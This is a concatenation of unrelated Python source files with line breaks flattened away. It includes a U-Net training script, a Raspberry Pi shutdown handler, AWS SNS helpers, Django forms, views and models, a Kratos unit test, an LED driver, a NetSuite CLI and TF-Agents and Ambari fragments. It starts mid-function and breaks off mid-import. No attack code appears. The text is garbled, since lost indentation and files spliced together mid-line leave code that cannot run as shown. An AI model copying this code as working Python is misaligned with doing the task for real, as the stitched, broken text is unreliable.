= 'he_normal')(merge6) conv6 = Conv2D(initx8, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv6) up7 = Conv2D(initx4, 2, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6)) merge7 = concatenate([conv3,up7], axis = 3) conv7 = Conv2D(initx4, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(merge7) conv7 = Conv2D(initx4, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv7) up8 = Conv2D(initx2, 2, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7)) merge8 = concatenate([conv2,up8], axis = 3) conv8 = Conv2D(initx2, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(merge8) conv8 = Conv2D(initx2, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv8) up9 = Conv2D(initial, 2, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8)) merge9 = concatenate([conv1,up9], axis = 3) conv9 = Conv2D(initial, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(merge9) conv9 = Conv2D(initial, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv9) conv9 = Conv2D(2, 3, activation = 'selu', padding = 'same', kernel_initializer = 'he_normal')(conv9) conv10 = Conv2D(1, 1, activation = 'sigmoid')(conv9) model = Model(inputs = inputs, outputs = conv10) model.compile(optimizer=Adam(lr = 1e-4), loss = balanced_cross_entropy(0.2), metrics = ['accuracy']) #model.compile(optimizer = SGD(lr=0.0001, decay=1e-5, momentum=0.9, nesterov=True), loss = 'binary_crossentropy', metrics = ['accuracy']) #Adam(lr = 1e-4) if(pretrained_weights): model.load_weights(pretrained_weights) return model with strategy.scope(): modelSegMuscles = unet(pretrained_weights = None) from tensorflow.keras.callbacks import LearningRateScheduler class LearningRateReducerCb(tf.keras.callbacks.Callback): def on_epoch_end(self, epoch, logs={}): old_lr = self.model.optimizer.lr.read_value() new_lr = old_lr * 0.9 print("\nEpoch: {}. Reducing Learning Rate from {} to {}".format(epoch, old_lr, new_lr)) self.model.optimizer.lr.assign(new_lr) callbacks=[LearningRateReducerCb()] hist= modelSegMuscles.fit(train_generator, steps_per_epoch=647//BATCH_SIZE, epochs=EPOCHS, validation_data=val_generator, #callbacks=callbacks, validation_steps=71//BATCH_SIZE ) # Plot training & validation accuracy values plt.plot(hist.history['accuracy']) plt.plot(hist.history['val_accuracy']) plt.title('Model accuracy') plt.ylabel('Accuracy') plt.xlabel('Epoch') plt.legend(['Train', 'Test'], loc='upper left') plt.show() # Plot training & validation loss values plt.plot(hist.history['loss']) plt.plot(hist.history['val_loss']) plt.title('Model loss') plt.ylabel('Loss') plt.xlabel('Epoch') plt.legend(['Train', 'Test'], loc='upper left') plt.show() import time import os import smbus import RPi.GPIO as GPIO bus = smbus.SMBus(1) GPIO.setmode(GPIO.BCM) GPIO.setup(4, GPIO.IN,pull_up_down=GPIO.PUD_UP) # function to shut down Pi def Int_shutdown(channel): # wait ten seconds time.sleep(5) # shutdown Raspberry Pi if power is still down if (GPIO.input(4) == False): os.system("sudo shutdown -h now") return #start I2C communication to disable hardware reset from I/O Module out_values = [0x00] bus.write_i2c_block_data(0x1C ,0,out_values) #add interrupt GPIO.add_event_detect(4, GPIO.FALLING, callback = Int_shutdown, bouncetime = 2000) # do nothing while waiting for power failure while 1: time.sleep(1) 0 import boto3 def client(): return boto3.client("sns") def all_topics(): return client().list_topics() def find_topic(topic_name): res = all_topics() for t in res["Topics"]: arn = t.get("TopicArn", "") if arn.find(topic_name) >= 0: return t def publish(topic_arn, message, subject=None): body = {"Message": message} if subject: body["Subject"] = subject return client().publish(TopicArn=topic_arn, **body) def publish_by_name(topic_name, message, subject=None): topic = find_topic(topic_name) return topic and publish(topic["TopicArn"], message, subject=subject) def get_sns_message_from_event(event): prefix = "Records" node = "Sns" if prefix in event and len(event[prefix]) > 0: if node in event[prefix][0]: return event[prefix][0][node] 1-10 # -*- encoding: utf-8 -*- # Module ianshow import ia636 as ia import numpy as np def t(s,dt=1): a = ia.iatext(s) b = np.pad(a,((6+3-dt,6+3-dt),(0+3-dt,0+3-dt)),'constant', constant_values=((False,False),(False,False))) c = np.pad(b,((dt,dt),(dt,dt)),'constant', constant_values=((True,True),(True,True))) return c def timg(f,dt=1): tFalse = t(' ',dt) dy, dx = tFalse.shape tTrue = np.zeros_like(tFalse) z = np.empty(tuple(np.array(f.shape) * np.array([dy,dx]))).astype(bool) if f.dtype == 'bool': for x in np.arange(f.shape[-1]): for y in np.arange(f.shape[-2]): if f[y,x]: z[y*dy:y*dy+dy,x*dx:x*dx+dx] = tFalse else: z[y*dy:y*dy+dy,x*dx:x*dx+dx] = tTrue z=~np.pad(z,((1,1),(1,1)),'constant') else: for x in np.arange(f.shape[-1]): for y in np.arange(f.shape[-2]): z[y*dy:y*dy+dy,x*dx:x*dx+dx] = t('%3d' % f[y,x],dt) z=np.pad(~z,((1,1),(1,1)),'constant') return z def ianshow(X, X1=None, X2=None, X3=None, X4=None, X5=None, X6=None): x = timg(X) x1,x2,x3,x4,x5,x6 = None,None,None,None,None,None if X1 is not None: x1 = ~timg(X1,3) if X2 is not None: x2 = ~timg(X2,3) if X3 is not None: x3 = ~timg(X3,3) if X4 is not None: x4 = ~timg(X4,3) if X5 is not None: x5 = ~timg(X5,3) if X6 is not None: x6 = ~timg(X6,3) return ia.iagshow(x,x1,x2,x3,x4,x5,x6) base/base_data_loader.py import numpy as np import pytorch_lightning as pl from box import Box from torch.utils.data import DataLoader, random_split from torch.utils.data.dataloader import default_collate from torch.utils.data.sampler import SubsetRandomSampler class BaseDataLoader(pl.LightningDataModule): """ Base class for all data loaders """ def __init__(self, dataset, batch_size, shuffle, validation_split, num_workers, collate_fn=default_collate): super().__init__() self.validation_split = validation_split self.shuffle = shuffle self.batch_idx = 0 self.n_samples = len(dataset) self.init_kwargs = Box({ 'dataset': dataset, 'batch_size': batch_size, 'shuffle': self.shuffle, 'collate_fn': collate_fn, 'num_workers': num_workers }) def setup(self, stage=None): if self.validation_split == 0.0: return None, None idx_full = np.arange(self.n_samples) np.random.seed(0) np.random.shuffle(idx_full) if isinstance(self.validation_split, int): assert self.validation_split > 0 assert self.validation_split < self.n_samples, "validation set size is configured to be larger than entire dataset." len_valid = self.validation_split else: len_valid = int(self.n_samples * self.validation_split) valid_idx = idx_full[0:len_valid] train_idx = np.delete(idx_full, np.arange(0, len_valid)) train_sampler, valid_sampler = random_split(self.init_kwargs.dataset, [len(train_idx), len(valid_idx)]) # turn off shuffle option which is mutually exclusive with sampler self.shuffle = False self.n_samples = len(train_idx) self.train_sampler = train_sampler self.valid_sampler = valid_sampler def train_dataloader(self): return DataLoader(self.train_sampler, batch_size=self.init_kwargs.batch_size) def val_dataloader(self): return DataLoader(self.valid_sampler, batch_size=self.init_kwargs.batch_size) def test_dataloader(self): return DataLoader(self.valid_sampler, batch_size=self.init_kwargs.batch_size) def split_validation(self): if self.valid_sampler is None: return None else: return DataLoader(sampler=self.valid_sampler, **self.init_kwargs) 1-10 from django.apps import AppConfig class WebcamCaptureConfig(AppConfig): name = 'webcam_capture' # Same as in BMW. Dynamic Object Creation.#!/usr/bin/env python # encoding: utf-8 from django import forms from .models import UserProfile from captcha.fields import CaptchaField class RegisterForm(forms.Form): username = forms.CharField(required=True) email = forms.EmailField(required=True) #前端添加再次输入密码的功能 password1 = forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) password2 = forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) class LoginForm(forms.Form): username = forms.CharField(required=True) password= forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) class ActiveForm(forms.Form): # 激活时不对邮箱密码做验证 # 应用验证码, 自定义错误输出key必须与异常一样 captcha = CaptchaField(error_messages={'invalid': u'验证码错误'}) class ChangePasswordForm(forms.Form): previousPassword = forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) newPassword1 = forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) newPassword2 = forms.CharField(required=True, widget=forms.PasswordInput, min_length=6) class UserCenterForm(forms.ModelForm): class Meta: model = UserProfile fields = ['nickname', 'gender', 'birthday']fairain/FasterRunner import os import json from django.core.exceptions import ObjectDoesNotExist from django.utils.decorators import method_decorator from django.http import FileResponse from rest_framework.views import APIView from rest_framework.response import Response from rest_framework import status from rest_framework.permissions import DjangoModelPermissions from fastrunner.utils import response from fastrunner.utils.decorator import request_log from fastrunner.utils.writeExcel import write_excel_log from fastrunner.utils.permissions import IsBelongToProject from fastrunner import models from FasterRunner.settings import MEDIA_ROOT class DownloadView(APIView): """下载文件接口 """ # permission_classes = (DjangoModelPermissions, IsBelongToProject) @method_decorator(request_log(level='DEBUG')) def post(self, request, **kwargs): """下载文件 请求参数:{ fileType: int (1:testdata, 2: report_excel 3: report_html) id: int, project: int } """ try: file_type = int(request.data["fileType"]) idno = int(request.data["id"]) project = int(request.data["project"]) except KeyError: return Response(response.KEY_MISS, status=status.HTTP_400_BAD_REQUEST) try: if file_type == 1: fileObject = models.ModelWithFileField.objects.get(project_id=project, id=idno) filename = fileObject.name filepath = os.path.join(MEDIA_ROOT, str(fileObject.file)) else: fileObject = models.ReportDetail.objects.get(project_id=project, report_id=idno) filename = fileObject.name summary = json.loads(fileObject.summary) filepath = write_excel_log(summary) fileresponse = FileResponse(open(filepath, 'rb')) fileresponse["Content-Type"] = "application/octet-stream" fileresponse["Content-Disposition"] = "attachment;filename={}".format(filename) return fileresponse except ObjectDoesNotExist: return Response(response.FILE_DOWNLOAD_FAIL, status=status.HTTP_400_BAD_REQUEST) import os import warnings import click from .elastic import (create_es_instance, run_note_upload, run_zotero_upload, stream_pdfs) from .interface.search import basic_search, search_format from .interface.term import SearchApp warnings.filterwarnings(action='ignore') @click.group() def cli(): ... @cli.command(name='start', help="Start search application") def start_shell(): SearchApp.run(log="textual.log") @cli.command(name='search', help='Do a single search') @click.argument("phrase", type=str) def upload_folder(phrase: os.PathLike): es_instance = create_es_instance() results = basic_search(es_instance, phrase, "notes") search_format(results) @cli.command(name='upload', help='Upload a given folder to ES') @click.argument("path", type=click.Path(exists=True)) def upload_folder(path: os.PathLike): run_note_upload(path, stream_fn=stream_pdfs) print("Upload completed successfully") @cli.command(name='zotero-upload', help='Upload zotero data to ES') def upload_zotero(): # TODO: check for the environment secrets run_zotero_upload() print("Upload completed successfully") if __name__ == "__main__": cli() import KratosMultiphysics as Kratos import KratosMultiphysics.StatisticsApplication as KratosStats import KratosMultiphysics.KratosUnittest as KratosUnittest from KratosMultiphysics.StatisticsApplication.spatial_utilities import GetItemContainer from KratosMultiphysics.StatisticsApplication.method_utilities import GetNormTypeContainer from KratosMultiphysics.StatisticsApplication.method_utilities import GetMethod from KratosMultiphysics.StatisticsApplication.test_utilities import CheckValues from KratosMultiphysics.StatisticsApplication.test_utilities import CreateModelPart from KratosMultiphysics.StatisticsApplication.test_utilities import InitializeModelPartVariables from KratosMultiphysics.StatisticsApplication.test_utilities import GetInitialVariableValue class SpatialMethodTests(KratosUnittest.TestCase): def setUp(self): self.model = Kratos.Model() self.model_part = self.model.CreateModelPart("test_model_part") self.containers_to_test = [ "nodal_historical", "nodal_non_historical", "element_non_historical", "condition_non_historical" ] self.test_cases = {} self.test_cases[Kratos.PRESSURE] = ["none", "magnitude", "value"] self.test_cases[Kratos.VELOCITY] = [ "none", "magnitude", "component_x", "component_y", "component_z" ] self.test_cases[Kratos.LOAD_MESHES] = [ "magnitude", "index_0", "index_1", "index_2", "index_4" ] self.test_cases[Kratos.GREEN_LAGRANGE_STRAIN_TENSOR] = [ "frobenius", "index_(0,0)", "index_(0,1)", "index_(4,1)", "index_(1,1)" ] self.norm_only_methods = ["min", "max", "median", "distribution"] SpatialMethodTests.__AddNodalSolutionStepVariables(self.model_part) CreateModelPart(self.model_part) InitializeModelPartVariables(self.model_part) def tearDown(self): # Code here will be placed AFTER every test in this TestCase. pass def testSumMethod(self): def analytical_method(container, container_type, norm_type, variable): analytical_value = GetInitialVariableValue(variable, norm_type) for item in container: analytical_value += SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) return analytical_value self.__TestMethod("sum", analytical_method) def testRootMeanSquareMethod(self): def analytical_method(container, container_type, norm_type, variable): analytical_value = GetInitialVariableValue(variable, norm_type) for item in container: analytical_value += KratosStats.MethodUtilities.RaiseToPower( SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type), 2) return KratosStats.MethodUtilities.RaiseToPower( analytical_value * (1.0 / len(container)), 0.5) self.__TestMethod("rootmeansquare", analytical_method) def testMeanMethod(self): def analytical_method(container, container_type, norm_type, variable): analytical_value = GetInitialVariableValue(variable, norm_type) for item in container: analytical_value += SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) return analytical_value / len(container) self.__TestMethod("mean", analytical_method) def testVarianceMethod(self): def analytical_method(container, container_type, norm_type, variable): mean_value = GetInitialVariableValue(variable, norm_type) variance_value = GetInitialVariableValue(variable, norm_type) for item in container: current_value = SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) mean_value += current_value variance_value += KratosStats.MethodUtilities.RaiseToPower( current_value, 2) n = len(container) mean_value /= n variance_value = variance_value / n - KratosStats.MethodUtilities.RaiseToPower( mean_value, 2) return mean_value, variance_value self.__TestMethod("variance", analytical_method) def testMinMethod(self): def analytical_method(container, container_type, norm_type, variable): analytical_value = 1e+12 for item in container: current_value = SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) if (current_value < analytical_value): analytical_value = current_value analytical_id = item.Id return analytical_value, analytical_id self.__TestMethod("min", analytical_method) def testMaxMethod(self): def analytical_method(container, container_type, norm_type, variable): analytical_value = -1e+12 for item in container: current_value = SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) if (current_value > analytical_value): analytical_value = current_value analytical_id = item.Id return analytical_value, analytical_id self.__TestMethod("max", analytical_method) def testMedianMethod(self): def analytical_method(container, container_type, norm_type, variable): item_values = [] for item in container: current_value = SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) item_values.append(current_value) item_values = sorted(item_values) n = len(item_values) if (n % 2 != 0): return item_values[n // 2] else: return (item_values[(n - 1) // 2] + item_values[n // 2]) * 0.5 self.__TestMethod("median", analytical_method) def testDistributionMethod(self): default_parameters = Kratos.Parameters(""" { "number_of_value_groups" : 10, "min_value" : "min", "max_value" : "max" }""") def analytical_method(container, container_type, norm_type, variable): item_values = [] for item in container: current_value = SpatialMethodTests.__GetNormValue( variable, SpatialMethodTests.__GetValue(item, container_type, variable), norm_type) item_values.append(current_value) min_value = min(item_values) max_value = max(item_values) group_limits = [ min_value + (max_value - min_value) * i / 10 for i in range(11) ] group_limits[-1] += 1e-16 group_limits.append(1e+100) data_distribution = [0 for i in range(len(group_limits))] mean_distribution = [0.0 for i in range(len(group_limits))] variance_distribution = [0.0 for i in range(len(group_limits))] for value in item_values: for i, v in enumerate(group_limits): if (value < v): data_distribution[i] += 1 mean_distribution[i] += value variance_distribution[i] += value**2.0 break percentage_data_distribution = [] for i, _ in enumerate(group_limits): percentage_data_distribution.append(data_distribution[i] / len(item_values)) if (data_distribution[i] > 0): mean_distribution[i] /= data_distribution[i] variance_distribution[i] /= data_distribution[i] variance_distribution[i] -= mean_distribution[i]**2.0 group_limits[-2] -= 1e-16 group_limits[-1] = max_value return min_value, max_value, group_limits, data_distribution, percentage_data_distribution, mean_distribution, variance_distribution self.__TestMethod("distribution", analytical_method, default_parameters) def __TestMethod(self, test_method_name, analytical_method, method_params=Kratos.Parameters("""{}""")): for container_type in self.containers_to_test: container = SpatialMethodTests.__GetContainer( self.model_part, container_type) item_method_container = GetItemContainer(container_type) for variable, norm_types in self.test_cases.items(): for norm_type in norm_types: item_method_norm_container = GetNormTypeContainer( item_method_container, norm_type) if (norm_type == "none" and test_method_name in self.norm_only_methods): continue test_method = GetMethod(item_method_norm_container, test_method_name) if (norm_type == "none"): method_value = test_method(self.model_part, variable) else: method_value = test_method(self.model_part, variable, norm_type, method_params) analytical_value = analytical_method( container, container_type, norm_type, variable) CheckValues(self, analytical_value, method_value, 10) @staticmethod def __AddNodalSolutionStepVariables(model_part): model_part.AddNodalSolutionStepVariable(Kratos.PRESSURE) model_part.AddNodalSolutionStepVariable(Kratos.VELOCITY) model_part.AddNodalSolutionStepVariable(Kratos.LOAD_MESHES) model_part.AddNodalSolutionStepVariable( Kratos.GREEN_LAGRANGE_STRAIN_TENSOR) @staticmethod def __GetValue(item, container_type, variable): if (container_type.endswith("non_historical")): return item.GetValue(variable) else: return item.GetSolutionStepValue(variable) @staticmethod def __GetNormValue(variable, value, norm_type): if (norm_type == "none"): return value norm_method = KratosStats.MethodUtilities.GetNormMethod( variable, norm_type) return norm_method(value) @staticmethod def __GetContainer(model_part, container_type): if (container_type.startswith("nodal")): return model_part.Nodes elif (container_type.startswith("element")): return model_part.Elements elif (container_type.startswith("condition")): return model_part.Conditions if __name__ == '__main__': KratosUnittest.main()blinkt_bitbang.py1-10 import atexit ###import RPi.GPIO as GPIO import pigpio __version__ = '0.1.1' pi = pigpio.pi() DAT = 23 CLK = 24 NUM_PIXELS = 8 BRIGHTNESS = 7 pixels = [[0, 0, 0, BRIGHTNESS]] * NUM_PIXELS _gpio_setup = False _clear_on_exit = True def _exit(): if _clear_on_exit: clear() show() # GPIO.cleanup() def set_brightness(brightness): """Set the brightness of all pixels :param brightness: Brightness: 0.0 to 1.0 """ if brightness < 0 or brightness > 1: raise ValueError("Brightness should be between 0.0 and 1.0") for x in range(NUM_PIXELS): pixels[x][3] = int(31.0 * brightness) & 0b11111 def clear(): """Clear the pixel buffer""" for x in range(NUM_PIXELS): pixels[x][0:3] = [0, 0, 0] def _write_byte(byte): for x in range(8): ### GPIO.output(DAT, byte & 0b10000000) pi.write(DAT, bool(byte & 0b10000000)) ### GPIO.output(CLK, 1) pi.write(CLK, 1) byte <<= 1 ### GPIO.output(CLK, 0) pi.write(CLK, 0) # Emit exactly enough clock pulses to latch the small dark die APA102s which are weird # for some reason it takes 36 clocks, the other IC takes just 4 (number of pixels/2) def _eof(): ### GPIO.output(DAT, 0) pi.write(DAT, 0) for x in range(36): ### GPIO.output(CLK, 1) pi.write(CLK, 1) ### GPIO.output(CLK, 0) pi.write(CLK, 0) def _sof(): ### GPIO.output(DAT, 0) pi.write(DAT, 0) for x in range(32): ### GPIO.output(CLK, 1) pi.write(CLK, 1) ### GPIO.output(CLK, 0) pi.write(CLK, 0) def show(): """Output the buffer to Blinkt!""" global _gpio_setup if not _gpio_setup: #### GPIO.setmode(GPIO.BCM) #### GPIO.setwarnings(False) #### GPIO.setup(DAT, GPIO.OUT) pi.set_mode(DAT, pigpio.OUTPUT) #### GPIO.setup(CLK, GPIO.OUT) pi.set_mode(CLK, pigpio.OUTPUT) atexit.register(_exit) _gpio_setup = True _sof() for pixel in pixels: r, g, b, brightness = pixel _write_byte(0b11100000 | brightness) _write_byte(b) _write_byte(g) _write_byte(r) _eof() def set_all(r, g, b, brightness=None): """Set the RGB value and optionally brightness of all pixels If you don't supply a brightness value, the last value set for each pixel be kept. :param r: Amount of red: 0 to 255 :param g: Amount of green: 0 to 255 :param b: Amount of blue: 0 to 255 :param brightness: Brightness: 0.0 to 1.0 (default around 0.2) """ for x in range(NUM_PIXELS): set_pixel(x, r, g, b, brightness) def get_pixel(x): """Get the RGB and brightness value of a specific pixel""" r, g, b, brightness = pixels[x] brightness /= 31.0 return r, g, b, round(brightness, 3) def set_pixel(x, r, g, b, brightness=None): """Set the RGB value, and optionally brightness, of a single pixel If you don't supply a brightness value, the last value will be kept. :param x: The horizontal position of the pixel: 0 to 7 :param r: Amount of red: 0 to 255 :param g: Amount of green: 0 to 255 :param b: Amount of blue: 0 to 255 :param brightness: Brightness: 0.0 to 1.0 (default around 0.2) """ if brightness is None: brightness = pixels[x][3] else: brightness = int(31.0 * brightness) & 0b11111 pixels[x] = [int(r) & 0xff, int(g) & 0xff, int(b) & 0xff, brightness] def set_clear_on_exit(value=True): """Set whether Blinkt! should be cleared upon exit By default Blinkt! will turn off the pixels on exit, but calling:: blinkt.set_clear_on_exit(False) Will ensure that it does not. :param value: True or False (default True) """ global _clear_on_exit _clear_on_exit = value 0 class Person: def __init__(self, navn): self.navn = navn def print(self): print("Hej, mit navn er",self.navn) elev = Person("Simon") elev.print() elev2 = Person("Phillip") elev2.print()fabriceb/netsuitenetsuite/cli/restlet.py import argparse from .. import json from ..client import NetSuite from ..config import Config __all__ = () def add_parser(parser, subparser): restlet_parser = subparser.add_parser( "restlet", description="Make NetSuite Restlet requests" ) restlet_subparser = restlet_parser.add_subparsers() _add_restlet_get_parser(restlet_parser, restlet_subparser) _add_restlet_post_parser(restlet_parser, restlet_subparser) _add_restlet_put_parser(restlet_parser, restlet_subparser) _add_restlet_delete_parser(restlet_parser, restlet_subparser) return (restlet_parser, restlet_subparser) def _add_restlet_get_parser(parser, subparser): async def restlet_get(config, args) -> str: restlet = _get_restlet_or_error(parser, config) resp = await restlet.get(script_id=args.script_id, deploy=args.deploy) return json.dumps(resp) p = subparser.add_parser( "get", description="Make a GET request to NetSuite Restlet" ) _add_default_restlet_args(p) p.set_defaults(func=restlet_get) def _add_restlet_post_parser(parser, subparser): async def restlet_post(config, args) -> str: restlet = _get_restlet_or_error(parser, config) with args.payload_file as fh: payload_str = fh.read() payload = json.loads(payload_str) resp = await restlet.post( script_id=args.script_id, deploy=args.deploy, json=payload ) return json.dumps(resp) p = subparser.add_parser( "post", description="Make a POST request to NetSuite Restlet" ) p.set_defaults(func=restlet_post) _add_default_restlet_args(p) p.add_argument("payload_file", type=argparse.FileType("r")) def _add_restlet_put_parser(parser, subparser): async def restlet_put(config, args) -> str: restlet = _get_restlet_or_error(parser, config) with args.payload_file as fh: payload_str = fh.read() payload = json.loads(payload_str) resp = await restlet.put( script_id=args.script_id, deploy=args.deploy, json=payload ) return json.dumps(resp) p = subparser.add_parser( "put", description="Make a PUT request to NetSuite Restlet" ) p.set_defaults(func=restlet_put) _add_default_restlet_args(p) p.add_argument("payload_file", type=argparse.FileType("r")) def _add_restlet_delete_parser(parser, subparser): async def restlet_delete(config, args) -> str: restlet = _get_restlet_or_error(parser, config) resp = await restlet.put(script_id=args.script_id, deploy=args.deploy) return json.dumps(resp) p = subparser.add_parser( "delete", description="Make a DELETE request to a NetSuite Restlet" ) p.set_defaults(func=restlet_delete) _add_default_restlet_args(p) def _get_restlet_or_error(parser, config: Config): ns = NetSuite(config) try: return ns.restlet # Cached property that initializes NetSuiteRestlet except RuntimeError as ex: parser.error(str(ex)) def _add_default_restlet_args(parser_: argparse.ArgumentParser): parser_.add_argument("script_id", type=int, help="The script to run") parser_.add_argument( "-d", "--deploy", type=int, default=1, help="The deployment version" ) """ Workspace Models """ from django.db import models from django.contrib.auth import get_user_model from django.contrib.postgres.fields import ArrayField from django_q.models import Schedule User = get_user_model() class Workspace(models.Model): """ Workspace model """ id = models.AutoField(primary_key=True, help_text='Unique Id to identify a workspace') name = models.CharField(max_length=255, help_text='Name of the workspace') user = models.ManyToManyField(User, help_text='Reference to users table') fyle_org_id = models.CharField(max_length=255, help_text='org id', unique=True) cluster_domain = models.CharField(max_length=255, help_text='Cluster Domain', null=True) last_synced_at = models.DateTimeField(help_text='Datetime when expenses were pulled last', null=True) source_synced_at = models.DateTimeField(help_text='Datetime when source dimensions were pulled', null=True) destination_synced_at = models.DateTimeField(help_text='Datetime when destination dimensions were pulled', null=True) created_at = models.DateTimeField(auto_now_add=True, help_text='Created at datetime') updated_at = models.DateTimeField(auto_now=True, help_text='Updated at datetime') class Meta: db_table = 'workspaces' REIMBURSABLE_EXPENSES_OBJECT_CHOICES = ( ('EXPENSE_REPORT', 'EXPENSE_REPORT'), ('BILL', 'BILL') ) COPORATE_CARD_EXPENSES_OBJECT_CHOICES = ( ('EXPENSE_REPORT', 'EXPENSE_REPORT'), ('BILL', 'BILL'), ('CHARGE_CARD_TRANSACTION', 'CHARGE_CARD_TRANSACTION') ) AUTO_MAP_EMPLOYEE_CHOICES = ( ('EMAIL', 'EMAIL'), ('NAME', 'NAME'), ('EMPLOYEE_CODE', 'EMPLOYEE_CODE'), ) def get_default_memo_fields(): return ['employee_email', 'category', 'spent_on', 'report_number', 'purpose', 'expense_link'] class Configuration(models.Model): """ Workspace General Settings """ id = models.AutoField(primary_key=True, help_text='Unique Id to identify a workspace') workspace = models.OneToOneField(Workspace, on_delete=models.PROTECT, help_text='Reference to Workspace model') reimbursable_expenses_object = models.CharField( max_length=50, choices=REIMBURSABLE_EXPENSES_OBJECT_CHOICES, help_text='Mapping Settings ( BILL / EXPENSE_REPORT )' ) corporate_credit_card_expenses_object = models.CharField( max_length=50, choices=COPORATE_CARD_EXPENSES_OBJECT_CHOICES, help_text='Mapping Settings ( BILL / CHARGE_CARD_TRANSACTION )', null=True ) import_projects = models.BooleanField(default=False, help_text='Auto import projects to Fyle') import_categories = models.BooleanField(default=False, help_text='Auto import caimport_categories to Fyle') sync_fyle_to_sage_intacct_payments = models.BooleanField(default=False, help_text='Auto Sync Payments from Fyle ' 'to Sage Intacct') sync_sage_intacct_to_fyle_payments = models.BooleanField(default=False, help_text='Auto Sync Payments from Sage ' 'Intacct to Fyle') auto_map_employees = models.CharField( max_length=50, choices=AUTO_MAP_EMPLOYEE_CHOICES, help_text='Auto Map Employees type from Sage Intacct to Fyle', null=True ) memo_structure = ArrayField( base_field=models.CharField(max_length=100), default=get_default_memo_fields, help_text='list of system fields for creating custom memo' ) auto_create_destination_entity = models.BooleanField(default=False, help_text='Auto create vendor / employee') created_at = models.DateTimeField(auto_now_add=True, help_text='Created at') updated_at = models.DateTimeField(auto_now=True, help_text='Updated at') class Meta: db_table = 'configurations' class SageIntacctCredential(models.Model): """ Table to store Sage Intacct credentials """ id = models.AutoField(primary_key=True) si_user_id = models.TextField(help_text='Stores Sage Intacct user id') si_company_id = models.TextField(help_text='Stores Sage Intacct company id') si_company_name = models.TextField(help_text='Stores Sage Intacct company name') si_user_password = models.TextField(help_text='Stores Sage Intacct user password') workspace = models.OneToOneField(Workspace, on_delete=models.PROTECT, help_text='Reference to Workspace model') created_at = models.DateTimeField(auto_now_add=True, help_text='Created at datetime') updated_at = models.DateTimeField(auto_now=True, help_text='Updated at datetime') class Meta: db_table = 'sage_intacct_credentials' class FyleCredential(models.Model): """ Table to store Fyle credentials """ id = models.AutoField(primary_key=True) refresh_token = models.TextField(help_text='Stores Fyle refresh token') workspace = models.OneToOneField(Workspace, on_delete=models.PROTECT, help_text='Reference to Workspace model') created_at = models.DateTimeField(auto_now_add=True, help_text='Created at datetime') updated_at = models.DateTimeField(auto_now=True, help_text='Updated at datetime') class Meta: db_table = 'fyle_credentials' class WorkspaceSchedule(models.Model): """ Workspace Schedule """ id = models.AutoField(primary_key=True, help_text='Unique Id to identify a schedule') workspace = models.OneToOneField(Workspace, on_delete=models.PROTECT, help_text='Reference to Workspace model') enabled = models.BooleanField(default=False) start_datetime = models.DateTimeField(help_text='Datetime for start of schedule', null=True) interval_hours = models.IntegerField(null=True) schedule = models.OneToOneField(Schedule, on_delete=models.PROTECT, null=True) class Meta: db_table = 'workspace_schedules' # coding=utf-8 # Copyright 2018 The TF-Agents Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Base class for drivers that takes steps in an environment.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import abc import six from tf_agents.environments import tf_environment from tf_agents.policies import tf_policy @six.add_metaclass(abc.ABCMeta) class Driver(object): """A driver that takes steps in an environment using a TF policy.""" def __init__(self, env, policy, observers=None): """Creates a Driver. Args: env: A tf_environment.Base environment. policy: A tf_policy.Base policy. observers: A list of observers that are updated after the driver is run. Each observer is a callable(TimeStepAction) that returns the input. TimeStepAction.time_step is a stacked batch [N+1, batch_size, ...] of timesteps and TimeStepAction.action is a stacked batch [N, batch_size, ...] of actions in time major form. Raises: ValueError: If env is not a tf_environment.Base or policy is not an instance of tf_policy.Base. """ if not isinstance(env, tf_environment.Base): raise ValueError('`env` must be an instance of tf_environment.Base.') if not isinstance(policy, tf_policy.Base): raise ValueError('`policy` must be an instance of tf_policy.Base.') self._env = env self._policy = policy self._observers = observers or [] @property def observers(self): return self._observers @abc.abstractmethod def run(self): """Takes steps in the environment and updates observers.""" 0 #!/usr/bin/env python """ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ # Python Imports import subprocess import os import re import time import shutil from datetime import datetime import json # Ambari Commons & Resource Management imports from resource_management.libraries.script.script import Script from resource_management.libraries.functions import format from resource_management.libraries.functions.check_process_status import check_process_status from 